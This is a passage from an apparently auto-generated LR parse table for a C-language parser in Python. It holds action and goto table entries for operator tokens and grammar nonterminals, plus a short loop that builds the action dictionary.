42,387,422,424,425,426,427,432,435,437,461,469,470,478,500,501,508,509,513,519,523,527,],[-307,-294,-308,-294,323,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,344,-279,-280,-304,-306,344,-183,-287,-274,-275,-276,-277,-278,344,-184,-186,344,-272,-273,-185,514,-289,-281,344,-288,-282,-290,-291,]),'ARROW':([127,144,163,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,325,326,333,334,387,422,424,425,426,427,469,470,508,513,519,],[-294,-308,-294,324,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-279,-280,-304,-306,-287,-274,-275,-276,-277,-278,-272,-273,-281,-288,-282,]),'XOREQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,292,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'TIMESEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,293,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'DIVEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,294,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'MODEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,295,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'PLUSEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,296,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'MINUSEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,297,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LSHIFTEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,298,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'RSHIFTEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,299,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'ANDEQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,300,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'OREQUAL':([127,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,301,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'CONDOP':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,302,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'DIVIDE':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,304,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,304,304,304,304,304,304,304,304,304,304,304,304,304,304,304,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'MOD':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,305,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,305,305,305,305,305,305,305,305,305,305,305,305,305,305,305,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'RSHIFT':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,308,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,308,308,308,308,308,308,308,308,308,308,308,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LSHIFT':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,309,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,309,309,309,309,309,309,309,309,309,309,309,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LT':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,310,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,310,310,310,310,310,310,310,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LE':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,311,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,311,311,311,311,311,311,311,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'GE':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,312,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,312,312,312,312,312,312,312,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'GT':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,313,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,313,313,313,313,313,313,313,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'EQ':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,314,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,314,314,314,314,314,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'NE':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,315,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,315,315,315,315,315,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'OR':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,317,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,317,317,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'XOR':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,318,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,318,-254,318,318,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LAND':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,319,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,319,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'LOR':([127,144,163,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,270,325,326,327,329,330,331,333,334,387,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,462,469,470,473,508,513,519,],[-294,-308,-294,-257,320,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-257,-279,-280,-260,-261,-262,-263,-304,-306,-287,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,-274,-275,-276,-277,-278,-258,-272,-273,-264,-281,-288,-282,]),'ELLIPSIS':([229,],[355,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = {}
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'translation_unit_or_empty':([0,],[1,]),'translation_unit':([0,],[2,]),'empty':([0,10,11,17,18,19,22,26,60,61,62,79,80,106,114,115,116,117,126,145,152,172,215,216,217,238,239,267,272,277,282,284,360,361,369,370,382,390,397,432,444,445,460,461,463,464,466,497,507,509,511,522,525,],[3,57,69,83,83,83,89,95,69,89,57,95,122,151,95,122,223,95,236,258,266,266,338,223,95,365,223,266,266,236,266,266,95,122,223,365,266,365,266,477,223,95,266,477,266,266,266,266,266,477,266,266,266,]),'external_declaration':([0,2,],[4,55,]),'function_definition':([0,2,],[5,5,]),'declaration':([0,2,10,58,62,106,152,284,],[6,6,59,107,59,154,154,397,]),'pp_directive':([0,2,],[7,7,]),'pppragma_directive':([0,2,104,106,139,140,141,152,172,249,251,267,272,282,382,460,463,464,507,522,525,],[8,8,147,162,147,147,147,162,282,147,147,282,282,162,282,282,282,282,282,282,282,]),'id_declarator':([0,2,11,22,24,60,61,71,111,126,129,145,238,378,],[10,10,62,92,93,108,92,93,108,231,108,108,93,108,]),'declaration_specifiers':([0,2,10,58,62,80,106,115,152,229,238,284,361,370,390,],[11,11,60,60,60,126,60,126,60,126,126,60,126,126,126,]),'decl_body':([0,2,10,58,62,106,152,284,],[12,12,12,12,12,12,12,12,]),'direct_id_declarator':([0,2,11,16,22,24,60,61,68,71,111,126,129,145,234,238,364,378,],[15,15,15,81,15,15,15,15,81,15,15,15,15,15,81,15,81,15,]),'pointer':([0,2,11,22,24,60,61,71,94,111,126,129,145,238,277,378,390,],[16,16,68,16,16,68,16,68,132,68,234,68,68,364,389,68,389,]),'type_qualifier':([0,2,10,11,17,18,19,26,58,60,62,79,80,96,104,106,114,115,117,118,126,139,140,141,145,149,152,168,217,218,229,238,249,251,271,277,284,328,332,335,360,361,370,390,445,446,],[17,17,17,63,17,17,17,97,17,63,17,97,17,133,97,17,97,17,97,133,63,97,97,97,257,133,17,97,97,133,17,17,97,97,97,257,17,97,97,97,97,17,17,17,97,133,]),'storage_class_specifier':([0,2,10,11,17,18,19,58,60,62,80,106,115,126,152,229,238,284,361,370,390,],[18,18,18,64,18,18,18,18,64,18,18,18,18,64,18,18,18,18,18,18,18,]),'function_specifier':([0,2,10,11,17,18,19,58,60,62,80,106,115,126,152,229,238,284,361,370,390,],[19,19,19,65,19,19,19,19,65,19,19,19,19,65,19,19,19,19,19,19,19,]),'type_specifier_no_typeid':([0,2,10,11,22,58,60,61,62,80,104,106,115,126,128,139,140,141,145,149,152,168,229,238,249,251,271,277,284,328,332,335,361,370,390,],[20,20,20,66,20,20,66,20,20,20,20,20,20,66,20,20,20,20,256,20,20,20,20,20,20,20,20,256,20,20,20,20,20,20,20,]),'type_specifier':([0,2,10,22,58,61,62,80,104,106,115,128,139,140,141,149,152,168,229,238,249,251,271,284,328,332,335,361,370,390,],[21,21,21,87,21,87,21,21,148,21,21,87,148,148,148,263,21,148,21,21,148,148,148,21,148,148,148,21,21,21,]),'declaration_specifiers_no_type':([0,2,10,17,18,19,58,62,80,106,115,152,229,238,284,361,370,390,],[22,22,61,84,84,84,61,61,128,61,128,61,128,128,61,128,128,128,]),'typedef_name':([0,2,10,22,58,61,62,80,104,106,115,128,139,140,141,149,152,168,229,238,249,251,271,284,328,332,335,361,370,390,],[27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,]),'enum_specifier':([0,2,10,22,58,61,62,80,104,106,115,128,139,140,141,149,152,168,229,238,249,251,271,284,328,332,335,361,370,390,],[28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,]),'struct_or_union_specifier':([0,2,10,22,58,61,62,80,104,106,115,128,139,140,141,149,152,168,229,238,249,251,271,284,328,332,335,361,370,390,],[29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,]),'struct_or_union':([0,2,10,22,58,61,62,80,104,106,115,128,139,140,141,149,152,168,229,238,249,251,271,284,328,332,335,361,370,390,],[32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,]),'declaration_list_opt':([10,62,],[56,109,]),'declaration_list':([10,62,],[58,58,]),'init_declarator_list_opt':([11,60,],[67,67,]),'init_declarator_list':([11,60,],[70,70,]),'init_declarator':([11,60,111,129,],[72,72,211,242,]),'declarator':([11,60,111,129,145,378,],[73,73,73,73,261,261,]),'typeid_declarator':([11,60,71,111,129,145,378,],[74,74,112,74,74,74,74,]),'direct_typeid_declarator':([11,60,68,71,111,129,145,378,],[75,75,110,75,75,75,75,75,]),'declaration_specifiers_no_type_opt':([17,18,19,],[82,85,86,]),'id_init_declarator_list_opt':([22,61,],[88,88,]),'id_init_declarator_list':([22,61,],[90,90,]),'id_init_declarator':([22,61,],[91,91,]),'type_qualifier_list_opt':([26,79,114,117,217,360,445,],[94,116,216,225,347,444,483,]),'type_qualifier_list':([26,79,104,114,117,139,140,141,168,217,249,251,271,328,332,335,360,445,],[96,118,149,218,96,149,149,149,149,96,149,149,149,149,149,149,446,96,]),'brace_open':([31,32,56,98,99,102,103,106,109,113,130,152,172,267,272,282,339,382,386,459,460,463,464,472,473,476,507,522,525,],[100,104,106,134,135,139,140,106,106,215,215,106,106,106,106,106,215,106,461,461,106,106,106,461,461,215,106,106,106,]),'compound_statement':([56,106,109,152,172,267,272,282,382,460,463,464,507,522,525,],[105,158,210,158,158,158,158,158,158,158,158,158,158,158,158,]),'parameter_type_list':([80,115,238,361,370,390,],[119,219,366,447,366,366,]),'identifier_list_opt':([80,115,361,],[120,220,448,]),'parameter_list':([80,115,238,361,370,390,],[121,121,121,121,121,121,]),'identifier_list':([80,115,361,],[123,123,123,]),'parameter_declaration':([80,115,229,238,361,370,390,],[124,124,356,124,124,124,124,]),'identifier':([80,106,113,115,116,130,152,164,168,172,177,183,184,185,187,216,225,226,230,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,344,347,348,361,369,379,382,386,397,444,459,460,463,464,465,466,468,471,474,476,483,484,497,507,511,514,515,522,525,],[125,195,195,125,195,195,195,195,195,195,195,195,195,195,195,195,195,195,357,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,437,195,195,125,195,195,195,195,195,195,195,195,195,195,195,195,195,195,501,195,195,195,195,195,195,523,195,195,195,]),'enumerator_list':([100,134,135,],[136,244,245,]),'enumerator':([100,134,135,247,],[137,137,137,373,]),'struct_declaration_list':([104,139,140,],[141,249,251,]),'brace_close':([104,136,139,140,141,150,244,245,249,251,336,432,492,509,],[142,246,250,252,253,264,371,372,375,376,431,475,508,519,]),'struct_declaration':([104,139,140,141,249,251,],[143,143,143,254,254,254,]),'specifier_qualifier_list':([104,139,140,141,168,249,251,271,328,332,335,],[145,145,145,145,277,145,145,277,277,277,277,]),'block_item_list_opt':([106,],[150,]),'block_item_list':([106,],[152,]),'block_item':([106,152,],[153,265,]),'statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[155,155,283,283,283,395,283,491,283,283,283,283,283,]),'labeled_statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[156,156,156,156,156,156,156,156,156,156,156,156,156,]),'expression_statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[157,157,157,157,157,157,157,157,157,157,157,157,157,]),'selection_statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[159,159,159,159,159,159,159,159,159,159,159,159,159,]),'iteration_statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[160,160,160,160,160,160,160,160,160,160,160,160,160,]),'jump_statement':([106,152,172,267,272,282,382,460,463,464,507,522,525,],[161,161,161,161,161,161,161,161,161,161,161,161,161,]),'expression_opt':([106,152,172,267,272,282,284,382,397,460,463,464,466,497,507,511,522,525,],[166,166,166,166,166,166,396,166,467,166,166,166,496,512,166,521,166,166,]),'expression':([106,152,168,172,177,267,271,272,274,279,280,282,284,302,321,328,332,382,397,460,463,464,465,466,497,507,511,515,522,525,],[169,169,276,169,288,169,276,169,385,392,393,169,169,401,420,276,276,169,169,169,169,169,495,169,169,169,169,524,169,169,]),'assignment_expression':([106,113,116,130,152,168,172,177,216,225,226,239,267,271,272,274,278,279,280,282,284,290,302,321,322,328,332,339,347,348,369,382,397,444,460,463,464,465,466,471,476,483,484,497,507,511,515,522,525,],[178,214,224,214,178,178,178,178,224,353,354,224,178,178,178,178,391,178,178,178,178,400,178,178,423,178,178,214,440,441,224,178,178,224,178,178,178,178,178,499,214,505,506,178,178,178,178,178,178,]),'conditional_expression':([106,113,116,130,152,164,168,172,177,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,321,322,328,332,339,343,347,348,369,379,382,397,444,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[179,179,179,179,179,269,179,179,179,179,179,179,179,269,269,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,269,179,179,179,269,179,179,179,179,179,179,179,179,498,179,179,179,179,179,179,179,179,179,179,]),'unary_expression':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[180,180,180,180,180,270,180,180,180,327,329,270,331,180,180,180,180,270,270,180,180,180,180,180,180,180,180,180,180,180,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,180,180,180,180,180,270,180,180,180,270,180,270,180,180,270,180,180,180,180,180,270,180,180,180,180,180,180,180,180,180,180,]),'binary_expression':([106,113,116,130,152,164,168,172,177,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,397,444,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,]),'postfix_expression':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,]),'unary_operator':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,]),'cast_expression':([106,113,116,130,152,164,168,172,177,185,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[186,186,186,186,186,186,186,186,186,330,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,462,186,186,462,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,]),'primary_expression':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,]),'constant':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,]),'unified_string_literal':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,]),'unified_wstring_literal':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198